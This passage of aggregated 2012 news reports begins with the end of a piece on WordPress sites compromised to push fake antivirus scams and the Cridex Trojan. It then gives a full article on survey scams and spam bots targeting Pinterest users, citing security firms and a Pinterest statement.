A full write-up of the attack, complete with screenshots of spam samples that have featured in the attack, can be found in a blog post by Trend Micro here.

More on the Cridex Trojan can be found in an earlier blog post by M86 Security here.

Earlier this month, Websense warned that vulnerable WordPress content management systems are being abused to promote fake anti-virus (AKA scareware) scams.

“The majority of targets are websites hosted by the WordPress content management system,” it said. “At the time of writing, more than 200,000 web pages have been compromised, amounting to close to 30,000 unique websites (hosts). The injection hijacks visitors to the compromised sites and redirects them to rogue AV sites that attempt to trick them into downloading and installing a Trojan onto their computer.” ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2012/03/23/wordpress_vuln_botnet_exploit/

Survey scammers fling spam at Pinterest punters

Cybercrooks have latched onto the success of social networking site Pinterest by launching a variety of money-making scams.

Just like Facebook before it, Pinterest has become a haven for survey scams. Would-be marks are invited to complete surveys under the pretext that they might win an iPad or obtain a discount voucher. In reality, they end up revealing personal information to unscrupulous marketing firms or (worse) signing up for mobile phone subscription services of dubious utility, such as daily horoscopes. In some cases these scams are even used to distribute malware.

Trend Micro reports that fake Starbucks discount card offers have become a particularly prevalent lure for survey scams on Pinterest.

Miscreants who promote survey scams profit through affiliate marketing funds maintained by dodgy marketing outfits. However, some lead to a cost-per-action (CPA) based network, in which case each successful sales conversion makes the scammer between $1 and $64 (£0.63 to £40), according to Symantec. The security firm speculates that a scammer might be earning a few hundred dollars each day from these scams.

Pinterest, a pinboard-style image- and photo-sharing social networking website, has experienced huge growth since its launch in 2010. These developments have not gone unnoticed among the ranks of cyber criminals and black hat marketers. Black Hat Tools, a digital underground site that built its reputation by selling suites for spamming Twitter and Facebook, has begun offering tools for spamming Pinterest. The charmingly titled “Pinterest bot collection” (presumably straight off the runways at Paris fashion shows) can be yours for $249, mobile security specialist Cloudmark reports.

Andrew Conway, lead software engineer at Cloudmark, commented: “In many ways, the survival of Pinterest largely depends on how successfully it can control these inevitable spam attacks and furthermore, how effectively it can respond to those criminals who are currently testing their defences.”

A Pinterest spokesperson said:

As a growing service, Pinterest is not immune to challenges faced by sites across the web including spam. However, it is a tremendous priority for us to quickly address them. Our engineers are actively working to manage issues as they arise and are revisiting the nature of public feeds on the site to make it harder for fake or harmful content to get into them.

®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2012/03/23/pinterest_attracts_scammers/